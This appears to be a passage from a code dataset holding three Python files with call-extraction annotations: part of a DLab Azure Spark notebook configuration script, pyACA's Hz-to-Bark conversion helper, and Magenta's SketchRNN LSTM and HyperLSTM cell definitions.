local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
# generating variables dictionary
print('Generating infrastructure names and tags')
notebook_config = dict()
try:
notebook_config['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-')
except:
notebook_config['exploratory_name'] = ''
try:
notebook_config['computational_name'] = os.environ['computational_name'].replace('_', '-')
except:
notebook_config['computational_name'] = ''
notebook_config['service_base_name'] = os.environ['conf_service_base_name']
notebook_config['resource_group_name'] = os.environ['azure_resource_group_name']
notebook_config['region'] = os.environ['azure_region']
notebook_config['user_name'] = os.environ['edge_user_name'].replace('_', '-')
notebook_config['project_name'] = os.environ['project_name'].replace('_', '-')
notebook_config['project_tag'] = os.environ['project_name'].replace('_', '-')
notebook_config['endpoint_tag'] = os.environ['endpoint_name'].replace('_', '-')
notebook_config['cluster_name'] = notebook_config['service_base_name'] + '-' + notebook_config['project_name'] + \
'-de-' + notebook_config['exploratory_name'] + '-' + \
notebook_config['computational_name']
notebook_config['master_node_name'] = notebook_config['cluster_name'] + '-m'
notebook_config['slave_node_name'] = notebook_config['cluster_name'] + '-s'
notebook_config['notebook_name'] = os.environ['notebook_instance_name']
notebook_config['key_path'] = os.environ['conf_key_dir'] + '/' + os.environ['conf_key_name'] + '.pem'
notebook_config['dlab_ssh_user'] = os.environ['conf_os_user']
notebook_config['instance_count'] = int(os.environ['dataengine_instance_count'])
try:
notebook_config['spark_master_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['master_node_name'])
notebook_config['notebook_ip'] = AzureMeta().get_private_ip_address(
notebook_config['resource_group_name'], notebook_config['notebook_name'])
except Exception as err:
print('Error: {0}'.format(err))
sys.exit(1)
notebook_config['spark_master_url'] = 'spark://{}:7077'.format(notebook_config['spark_master_ip'])
except Exception as err:
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to generate infrastructure names", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
print('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')
params = "--cluster_name {0} --spark_version {1} --hadoop_version {2} --os_user {3} --spark_master {4}" \
" --keyfile {5} --notebook_ip {6} --datalake_enabled {7} --spark_master_ip {8}".\
format(notebook_config['cluster_name'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], notebook_config['dlab_ssh_user'],
notebook_config['spark_master_url'], notebook_config['key_path'], notebook_config['notebook_ip'],
os.environ['azure_datalake_enable'], notebook_config['spark_master_ip'])
try:
local("~/scripts/{}_{}.py {}".format(os.environ['application'], 'install_dataengine_kernels', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed installing Dataengine kernels.", str(err))
sys.exit(1)
try:
logging.info('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
print('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')
params = "--hostname {0} " \
"--keyfile {1} " \
"--os_user {2} " \
"--cluster_name {3} " \
.format(notebook_config['notebook_ip'],
notebook_config['key_path'],
notebook_config['dlab_ssh_user'],
notebook_config['cluster_name'])
try:
local("~/scripts/{0}.py {1}".format('common_configure_spark', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(notebook_config['instance_count'] - 1):
slave_name = notebook_config['slave_node_name'] + '{}'.format(i+1)
AzureActions().remove_instance(notebook_config['resource_group_name'], slave_name)
AzureActions().remove_instance(notebook_config['resource_group_name'], notebook_config['master_node_name'])
append_result("Failed to configure Spark.", str(err))
sys.exit(1)
try:
with open("/root/result.json", 'w') as result:
res = {"notebook_name": notebook_config['notebook_name'],
"Action": "Configure notebook server"}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
| [((38, 4, 40, 52), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((89, 8, 89, 68), 'logging.info', 'logging.info', ({(89, 21, 89, 67): '"""[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]"""'}, {}), "('[INSTALLING KERNELS INTO SPECIFIED NOTEBOOK]')", False, 'import logging\n'), ((112, 8, 112, 72), 'logging.info', 'logging.info', ({(112, 21, 112, 71): '"""[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]"""'}, {}), "('[UPDATING SPARK CONFIGURATION FILES ON NOTEBOOK]')", False, 'import logging\n'), ((86, 8, 86, 19), 'sys.exit', 'sys.exit', ({(86, 17, 86, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((109, 8, 109, 19), 'sys.exit', 'sys.exit', ({(109, 17, 109, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((134, 8, 134, 19), 'sys.exit', 'sys.exit', ({(134, 17, 134, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((144, 8, 144, 19), 'sys.exit', 'sys.exit', ({(144, 17, 144, 18): '(0)'}, {}), '(0)', False, 'import sys\n'), ((77, 12, 77, 23), 'sys.exit', 'sys.exit', ({(77, 21, 77, 22): '(1)'}, {}), '(1)', False, 'import sys\n'), ((140, 18, 140, 33), 'json.dumps', 'json.dumps', ({(140, 29, 140, 32): 'res'}, {}), '(res)', False, 'import json\n'), ((141, 25, 141, 40), 'json.dumps', 'json.dumps', ({(141, 36, 141, 39): 'res'}, {}), '(res)', False, 'import json\n')] |
ruohoruotsi/pyACA | pyACA/ToolFreq2Bark.py | 339e9395b65a217aa5965638af941b32d5c95454 | # -*- coding: utf-8 -*-
"""
helper function: convert Hz to Bark scale
Args:
fInHz: The frequency to be converted, can be scalar or vector
cModel: The name of the model ('Schroeder' [default], 'Terhardt', 'Zwicker', 'Traunmuller')
Returns:
Bark values of the input dimension
"""
import numpy as np
import math
def ToolFreq2Bark(fInHz, cModel = 'Schroeder'):
def acaSchroeder_scalar(f):
return 7 * math.asinh(f/650)
def acaTerhardt_scalar(f):
return 13.3 * math.atan(0.75 * f/1000)
def acaZwicker_scalar(f):
return 13 * math.atan(0.76 * f/1000) + 3.5 * math.atan(f/7500)
def acaTraunmuller_scalar(f):
return 26.81/(1+1960./f) - 0.53
f = np.asarray(fInHz)
if f.ndim == 0:
if cModel == 'Terhardt':
return acaTerhardt_scalar(f)
elif cModel == 'Zwicker':
return acaZwicker_scalar(f)
elif cModel == 'Traunmuller':
return acaTraunmuller_scalar(f)
else:
return acaSchroeder_scalar(f)
fBark = np.zeros(f.shape)
if cModel == 'Terhardt':
for k,fi in enumerate(f):
fBark[k] = acaTerhardt_scalar(fi)
elif cModel == 'Zwicker':
for k,fi in enumerate(f):
fBark[k] = acaZwicker_scalar(fi)
elif cModel == 'Traunmuller':
for k,fi in enumerate(f):
fBark[k] = acaTraunmuller_scalar(fi)
else:
for k,fi in enumerate(f):
fBark[k] = acaSchroeder_scalar(fi)
return (fBark)
| [((27, 8, 27, 25), 'numpy.asarray', 'np.asarray', ({(27, 19, 27, 24): 'fInHz'}, {}), '(fInHz)', True, 'import numpy as np\n'), ((38, 12, 38, 29), 'numpy.zeros', 'np.zeros', ({(38, 21, 38, 28): 'f.shape'}, {}), '(f.shape)', True, 'import numpy as np\n'), ((19, 19, 19, 36), 'math.asinh', 'math.asinh', ({(19, 30, 19, 35): '(f / 650)'}, {}), '(f / 650)', False, 'import math\n'), ((21, 22, 21, 46), 'math.atan', 'math.atan', ({(21, 32, 21, 45): '(0.75 * f / 1000)'}, {}), '(0.75 * f / 1000)', False, 'import math\n'), ((23, 20, 23, 44), 'math.atan', 'math.atan', ({(23, 30, 23, 43): '(0.76 * f / 1000)'}, {}), '(0.76 * f / 1000)', False, 'import math\n'), ((23, 53, 23, 70), 'math.atan', 'math.atan', ({(23, 63, 23, 69): '(f / 7500)'}, {}), '(f / 7500)', False, 'import math\n')] |
laurens-in/magenta | magenta/models/sketch_rnn/rnn.py | be6ed8d5b1eb2986ca277aa9c574a7912dd5ed0f | # Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SketchRNN RNN definition."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.contrib import rnn as contrib_rnn
def orthogonal(shape):
"""Orthogonal initilaizer."""
flat_shape = (shape[0], np.prod(shape[1:]))
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v
return q.reshape(shape)
def orthogonal_initializer(scale=1.0):
"""Orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
return tf.constant(orthogonal(shape) * scale, dtype)
return _initializer
def lstm_ortho_initializer(scale=1.0):
"""LSTM orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
size_x = shape[0]
size_h = shape[1] // 4 # assumes lstm.
t = np.zeros(shape)
t[:, :size_h] = orthogonal([size_x, size_h]) * scale
t[:, size_h:size_h * 2] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 2:size_h * 3] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 3:] = orthogonal([size_x, size_h]) * scale
return tf.constant(t, dtype)
return _initializer
class LSTMCell(contrib_rnn.RNNCell):
"""Vanilla LSTM cell.
Uses ortho initializer, and also recurrent dropout without memory loss
(https://arxiv.org/abs/1603.05118)
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.9):
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def state_size(self):
return 2 * self.num_units
@property
def output_size(self):
return self.num_units
def get_output(self, state):
unused_c, h = tf.split(state, 2, 1)
return h
def __call__(self, x, state, scope=None):
with tf.variable_scope(scope or type(self).__name__):
c, h = tf.split(state, 2, 1)
x_size = x.get_shape().as_list()[1]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
# Keep W_xh and W_hh separate here as well to use different init methods.
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
concat = tf.concat([x, h], 1)
w_full = tf.concat([w_xh, w_hh], 0)
hidden = tf.matmul(concat, w_full) + bias
i, j, f, o = tf.split(hidden, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(new_c) * tf.sigmoid(o)
return new_h, tf.concat([new_c, new_h], 1) # fuk tuples.
def layer_norm_all(h,
batch_size,
base,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Layer Norm (faster version, but not using defun)."""
# Performs layer norm on multiple base at once (ie, i, g, j, o for lstm)
# Reshapes h in to perform layer norm in parallel
h_reshape = tf.reshape(h, [batch_size, base, num_units])
mean = tf.reduce_mean(h_reshape, [2], keep_dims=True)
var = tf.reduce_mean(tf.square(h_reshape - mean), [2], keep_dims=True)
epsilon = tf.constant(epsilon)
rstd = tf.rsqrt(var + epsilon)
h_reshape = (h_reshape - mean) * rstd
# reshape back to original
h = tf.reshape(h_reshape, [batch_size, base * num_units])
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [4 * num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [4 * num_units], initializer=tf.constant_initializer(0.0))
if use_bias:
return gamma * h + beta
return gamma * h
def layer_norm(x,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Calculate layer norm."""
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
x_shifted = x - mean
var = tf.reduce_mean(tf.square(x_shifted), axes, keep_dims=True)
inv_std = tf.rsqrt(var + epsilon)
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [num_units], initializer=tf.constant_initializer(0.0))
output = gamma * (x_shifted) * inv_std
if use_bias:
output += beta
return output
def raw_layer_norm(x, epsilon=1e-3):
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
std = tf.sqrt(
tf.reduce_mean(tf.square(x - mean), axes, keep_dims=True) + epsilon)
output = (x - mean) / (std)
return output
def super_linear(x,
output_size,
scope=None,
reuse=False,
init_w='ortho',
weight_start=0.0,
use_bias=True,
bias_start=0.0,
input_size=None):
"""Performs linear operation. Uses ortho init defined earlier."""
shape = x.get_shape().as_list()
with tf.variable_scope(scope or 'linear'):
if reuse:
tf.get_variable_scope().reuse_variables()
w_init = None # uniform
if input_size is None:
x_size = shape[1]
else:
x_size = input_size
if init_w == 'zeros':
w_init = tf.constant_initializer(0.0)
elif init_w == 'constant':
w_init = tf.constant_initializer(weight_start)
elif init_w == 'gaussian':
w_init = tf.random_normal_initializer(stddev=weight_start)
elif init_w == 'ortho':
w_init = lstm_ortho_initializer(1.0)
w = tf.get_variable(
'super_linear_w', [x_size, output_size], tf.float32, initializer=w_init)
if use_bias:
b = tf.get_variable(
'super_linear_b', [output_size],
tf.float32,
initializer=tf.constant_initializer(bias_start))
return tf.matmul(x, w) + b
return tf.matmul(x, w)
class LayerNormLSTMCell(contrib_rnn.RNNCell):
"""Layer-Norm, with Ortho Init. and Recurrent Dropout without Memory Loss.
https://arxiv.org/abs/1607.06450 - Layer Norm
https://arxiv.org/abs/1603.05118 - Recurrent Dropout without Memory Loss
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90):
"""Initialize the Layer Norm LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def input_size(self):
return self.num_units
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.num_units
def get_output(self, state):
h, unused_c = tf.split(state, 2, 1)
return h
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
h, c = tf.split(state, 2, 1)
h_size = self.num_units
x_size = x.get_shape().as_list()[1]
batch_size = x.get_shape().as_list()[0]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
concat = tf.concat([x, h], 1) # concat for speed.
w_full = tf.concat([w_xh, w_hh], 0)
concat = tf.matmul(concat, w_full) #+ bias # live life without garbage.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
concat = layer_norm_all(concat, batch_size, 4, h_size, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, h_size, 'ln_c')) * tf.sigmoid(o)
return new_h, tf.concat([new_h, new_c], 1)
class HyperLSTMCell(contrib_rnn.RNNCell):
"""HyperLSTM with Ortho Init, Layer Norm, Recurrent Dropout, no Memory Loss.
https://arxiv.org/abs/1609.09106
http://blog.otoro.net/2016/09/28/hyper-networks/
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90,
use_layer_norm=True,
hyper_num_units=256,
hyper_embedding_size=32,
hyper_use_recurrent_dropout=False):
"""Initialize the Layer Norm HyperLSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
use_layer_norm: boolean. (default True)
Controls whether we use LayerNorm layers in main LSTM & HyperLSTM cell.
hyper_num_units: int, number of units in HyperLSTM cell.
(default is 128, recommend experimenting with 256 for larger tasks)
hyper_embedding_size: int, size of signals emitted from HyperLSTM cell.
(default is 16, recommend trying larger values for large datasets)
hyper_use_recurrent_dropout: boolean. (default False)
Controls whether HyperLSTM cell also uses recurrent dropout.
Recommend turning this on only if hyper_num_units becomes large (>= 512)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
self.use_layer_norm = use_layer_norm
self.hyper_num_units = hyper_num_units
self.hyper_embedding_size = hyper_embedding_size
self.hyper_use_recurrent_dropout = hyper_use_recurrent_dropout
self.total_num_units = self.num_units + self.hyper_num_units
if self.use_layer_norm:
cell_fn = LayerNormLSTMCell
else:
cell_fn = LSTMCell
self.hyper_cell = cell_fn(
hyper_num_units,
use_recurrent_dropout=hyper_use_recurrent_dropout,
dropout_keep_prob=dropout_keep_prob)
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.total_num_units
def get_output(self, state):
total_h, unused_total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
return h
def hyper_norm(self, layer, scope='hyper', use_bias=True):
num_units = self.num_units
embedding_size = self.hyper_embedding_size
# recurrent batch norm init trick (https://arxiv.org/abs/1603.09025).
init_gamma = 0.10 # cooijmans' da man.
with tf.variable_scope(scope):
zw = super_linear(
self.hyper_output,
embedding_size,
init_w='constant',
weight_start=0.00,
use_bias=True,
bias_start=1.0,
scope='zw')
alpha = super_linear(
zw,
num_units,
init_w='constant',
weight_start=init_gamma / embedding_size,
use_bias=False,
scope='alpha')
result = tf.multiply(alpha, layer)
if use_bias:
zb = super_linear(
self.hyper_output,
embedding_size,
init_w='gaussian',
weight_start=0.01,
use_bias=False,
bias_start=0.0,
scope='zb')
beta = super_linear(
zb,
num_units,
init_w='constant',
weight_start=0.00,
use_bias=False,
scope='beta')
result += beta
return result
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
total_h, total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
c = total_c[:, 0:self.num_units]
self.hyper_state = tf.concat(
[total_h[:, self.num_units:], total_c[:, self.num_units:]], 1)
batch_size = x.get_shape().as_list()[0]
x_size = x.get_shape().as_list()[1]
self._input_size = x_size
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
# concatenate the input and hidden states for hyperlstm input
hyper_input = tf.concat([x, h], 1)
hyper_output, hyper_new_state = self.hyper_cell(hyper_input,
self.hyper_state)
self.hyper_output = hyper_output
self.hyper_state = hyper_new_state
xh = tf.matmul(x, w_xh)
hh = tf.matmul(h, w_hh)
# split Wxh contributions
ix, jx, fx, ox = tf.split(xh, 4, 1)
ix = self.hyper_norm(ix, 'hyper_ix', use_bias=False)
jx = self.hyper_norm(jx, 'hyper_jx', use_bias=False)
fx = self.hyper_norm(fx, 'hyper_fx', use_bias=False)
ox = self.hyper_norm(ox, 'hyper_ox', use_bias=False)
# split Whh contributions
ih, jh, fh, oh = tf.split(hh, 4, 1)
ih = self.hyper_norm(ih, 'hyper_ih', use_bias=True)
jh = self.hyper_norm(jh, 'hyper_jh', use_bias=True)
fh = self.hyper_norm(fh, 'hyper_fh', use_bias=True)
oh = self.hyper_norm(oh, 'hyper_oh', use_bias=True)
# split bias
ib, jb, fb, ob = tf.split(bias, 4, 0) # bias is to be broadcasted.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i = ix + ih + ib
j = jx + jh + jb
f = fx + fh + fb
o = ox + oh + ob
if self.use_layer_norm:
concat = tf.concat([i, j, f, o], 1)
concat = layer_norm_all(concat, batch_size, 4, self.num_units, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, self.num_units, 'ln_c')) * tf.sigmoid(o)
hyper_h, hyper_c = tf.split(hyper_new_state, 2, 1)
new_total_h = tf.concat([new_h, hyper_h], 1)
new_total_c = tf.concat([new_c, hyper_c], 1)
new_total_state = tf.concat([new_total_h, new_total_c], 1)
return new_h, new_total_state
| [((29, 6, 29, 44), 'numpy.random.normal', 'np.random.normal', ({(29, 23, 29, 26): '0.0', (29, 28, 29, 31): '1.0', (29, 33, 29, 43): 'flat_shape'}, {}), '(0.0, 1.0, flat_shape)', True, 'import numpy as np\n'), ((30, 12, 30, 49), 'numpy.linalg.svd', 'np.linalg.svd', (), '', True, 'import numpy as np\n'), ((137, 14, 137, 58), 'tensorflow.compat.v1.reshape', 'tf.reshape', ({(137, 25, 137, 26): 'h', (137, 28, 137, 57): '[batch_size, base, num_units]'}, {}), '(h, [batch_size, base, num_units])', True, 'import tensorflow.compat.v1 as tf\n'), ((138, 9, 138, 55), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((140, 12, 140, 32), 'tensorflow.compat.v1.constant', 'tf.constant', ({(140, 24, 140, 31): 'epsilon'}, {}), '(epsilon)', True, 'import tensorflow.compat.v1 as tf\n'), ((141, 9, 141, 32), 'tensorflow.compat.v1.rsqrt', 'tf.rsqrt', ({(141, 18, 141, 31): 'var + epsilon'}, {}), '(var + epsilon)', True, 'import tensorflow.compat.v1 as tf\n'), ((144, 6, 144, 59), 'tensorflow.compat.v1.reshape', 'tf.reshape', ({(144, 17, 144, 26): 'h_reshape', (144, 28, 144, 58): '[batch_size, base * num_units]'}, {}), '(h_reshape, [batch_size, base * num_units])', True, 'import tensorflow.compat.v1 as tf\n'), ((168, 9, 168, 48), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((171, 12, 171, 35), 'tensorflow.compat.v1.rsqrt', 'tf.rsqrt', ({(171, 21, 171, 34): 'var + epsilon'}, {}), '(var + epsilon)', True, 'import tensorflow.compat.v1 as tf\n'), ((189, 9, 189, 48), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((28, 26, 28, 44), 'numpy.prod', 'np.prod', ({(28, 34, 28, 43): 'shape[1:]'}, {}), '(shape[1:])', True, 'import numpy as np\n'), ((50, 8, 50, 23), 'numpy.zeros', 'np.zeros', ({(50, 17, 50, 22): 'shape'}, {}), '(shape)', True, 'import numpy as np\n'), ((55, 11, 55, 32), 'tensorflow.compat.v1.constant', 'tf.constant', ({(55, 23, 55, 24): 't', (55, 26, 55, 31): 'dtype'}, {}), '(t, dtype)', True, 'import tensorflow.compat.v1 as tf\n'), ((86, 18, 86, 39), 'tensorflow.compat.v1.split', 'tf.split', ({(86, 27, 86, 32): 'state', (86, 34, 86, 35): '2', (86, 37, 86, 38): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((139, 23, 139, 50), 'tensorflow.compat.v1.square', 'tf.square', ({(139, 33, 139, 49): 'h_reshape - mean'}, {}), '(h_reshape - mean)', True, 'import tensorflow.compat.v1 as tf\n'), ((145, 7, 145, 31), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(145, 25, 145, 30): 'scope'}, {}), '(scope)', True, 'import tensorflow.compat.v1 as tf\n'), ((170, 23, 170, 43), 'tensorflow.compat.v1.square', 'tf.square', ({(170, 33, 170, 42): 'x_shifted'}, {}), '(x_shifted)', True, 'import tensorflow.compat.v1 as tf\n'), ((172, 7, 172, 31), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(172, 25, 172, 30): 'scope'}, {}), '(scope)', True, 'import tensorflow.compat.v1 as tf\n'), ((207, 7, 207, 43), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(207, 25, 207, 42): "(scope or 'linear')"}, {}), "(scope or 'linear')", True, 'import tensorflow.compat.v1 as tf\n'), ((225, 8, 226, 80), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((233, 11, 233, 26), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(233, 21, 233, 22): 'x', (233, 24, 233, 25): 'w'}, {}), '(x, w)', True, 'import tensorflow.compat.v1 as tf\n'), ((274, 18, 274, 39), 'tensorflow.compat.v1.split', 'tf.split', ({(274, 27, 274, 32): 'state', (274, 34, 274, 35): '2', (274, 37, 274, 38): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((379, 30, 379, 51), 'tensorflow.compat.v1.split', 'tf.split', ({(379, 39, 379, 44): 'state', (379, 46, 379, 47): '2', (379, 49, 379, 50): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((91, 13, 91, 34), 'tensorflow.compat.v1.split', 'tf.split', ({(91, 22, 91, 27): 'state', (91, 29, 91, 30): '2', (91, 32, 91, 33): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((100, 13, 101, 67), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((102, 13, 103, 75), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((108, 15, 108, 35), 'tensorflow.compat.v1.concat', 'tf.concat', ({(108, 25, 108, 31): '[x, h]', (108, 33, 108, 34): '1'}, {}), '([x, h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((109, 15, 109, 41), 'tensorflow.compat.v1.concat', 'tf.concat', ({(109, 25, 109, 37): '[w_xh, w_hh]', (109, 39, 109, 40): '0'}, {}), '([w_xh, w_hh], 0)', True, 'import tensorflow.compat.v1 as tf\n'), ((112, 19, 112, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(112, 28, 112, 34): 'hidden', (112, 36, 112, 37): '4', (112, 39, 112, 40): '1'}, {}), '(hidden, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((217, 15, 217, 43), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(217, 39, 217, 42): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((279, 13, 279, 34), 'tensorflow.compat.v1.split', 'tf.split', ({(279, 22, 279, 27): 'state', (279, 29, 279, 30): '2', (279, 32, 279, 33): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((289, 13, 290, 67), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((291, 13, 292, 75), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((294, 15, 294, 35), 'tensorflow.compat.v1.concat', 'tf.concat', ({(294, 25, 294, 31): '[x, h]', (294, 33, 294, 34): '1'}, {}), '([x, h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((295, 15, 295, 41), 'tensorflow.compat.v1.concat', 'tf.concat', ({(295, 25, 295, 37): '[w_xh, w_hh]', (295, 39, 295, 40): '0'}, {}), '([w_xh, w_hh], 0)', True, 'import tensorflow.compat.v1 as tf\n'), ((296, 15, 296, 40), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(296, 25, 296, 31): 'concat', (296, 33, 296, 39): 'w_full'}, {}), '(concat, w_full)', True, 'import tensorflow.compat.v1 as tf\n'), ((300, 19, 300, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(300, 28, 300, 34): 'concat', (300, 36, 300, 37): '4', (300, 39, 300, 40): '1'}, {}), '(concat, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((310, 18, 310, 46), 'tensorflow.compat.v1.concat', 'tf.concat', 